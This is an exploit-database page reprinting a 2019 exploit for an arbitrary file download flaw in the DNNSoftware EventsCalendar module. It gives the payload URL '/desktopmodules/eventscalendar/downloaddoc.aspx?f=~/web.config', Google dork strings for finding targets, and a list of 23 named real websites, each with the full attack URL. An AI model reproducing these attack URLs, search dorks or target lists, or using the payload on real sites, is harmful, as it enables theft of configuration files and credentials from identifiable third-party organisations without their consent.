Advertisement






DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download

CVE Category Price Severity
CVE-2020-6533 CWE-16 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-01-18
CPE
cpe:cpe:/a:dnnsoftware:eventscalendar_modules:1.x
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 0.37413 0.9213

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010186

Below is a copy:

DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download
####################################################################

# Exploit Title : DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : dnnsoftware.com
# Software Information Link : store.dnnsoftware.com/home/product-details/events-calendar
# Software Version : 1.x and All Versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Copyright 2019 by Associated Builders and Contractors''
inurl:''/desktopmodules/eventscalendar/''
# Vulnerability Type : CWE-16  [ Configuration ]

####################################################################

# Description :
************* 

* Events Calendar is a calendar to add and display events with time and description in rich text editor. 

* DotNetNuke DNNSoftware Events Calendar Modules 1.x and other versions 

is prone to a vulnerability that lets attackers download arbitrary files because 

the application fails to sufficiently verify user-supplied input.

* This may allow an attacker to gain access to sensitive information, which may aid in launching further attacks.

* The attacker can download and read all and any files known by the name via '?f=' parameter.

# Arbitrary File Download Exploit :
*******************************

/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

/desktopmodules/eventscalendar/downloaddoc.aspx?f=[DOWNLOAD-ANY-FILE]

####################################################################

# Example Vulnerable Sites :
*************************

Note : (38.95.37.77) => There are 73 domains hosted on this server.

[+] abcga.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcgmc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] mnabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abclaventura.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abccarolinas.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcnjc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcpnw.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcwestwa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abc-chesapeake.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] ocl.net/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] aeawave.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] tkhobby.nu/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcark.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] av-warehouse.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] nocabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] ezt.ca/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abccentralcal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcwpa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcnevada.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcsocal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] ctabc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcalaska.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

[+] abcfirstcoast.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.